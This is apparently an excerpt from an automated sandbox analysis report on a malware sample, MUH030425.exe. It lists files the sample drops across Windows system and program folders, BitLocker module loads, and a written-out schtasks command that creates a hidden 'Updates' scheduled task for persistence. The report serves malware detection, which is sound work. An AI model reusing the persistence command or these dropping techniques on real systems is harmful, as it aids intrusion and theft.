              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\Install\{9DD40E31-8782-438B-BCFD-713DE1B3090F}\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\nss3.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSACCESS.EXEJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\vds.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\nssdbm3.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\freebl3.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\TieringEngineService.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-file-l1-2-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-file-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXEJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\vcruntime140.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXEJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-file-l2-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\MUH030425.exeFile created: C:\Users\user\AppData\Roaming\wBBaygjR.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\softokn3.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\mozglue.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\AgentService.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXEJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\AgentService.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\TieringEngineService.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\vds.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file

              Boot Survival

              barindex
              Uses schtasks.exe or at.exe to add and modify task schedules
              Source: C:\Users\user\Desktop\MUH030425.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wBBaygjR" /XML "C:\Users\user\AppData\Local\Temp\tmpD1E0.tmp"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02C4CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,8_2_02C4CBD0

              Hooking and other Techniques for Hiding and Protection

              barindex
              Creates files inside the volume driver (system volume information)
              Source: C:\Windows\System32\TieringEngineService.exeFile created: C:\System Volume Information\Heat\
              Loading BitLocker PowerShell Module
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00417B1A LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,8_2_00417B1A
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
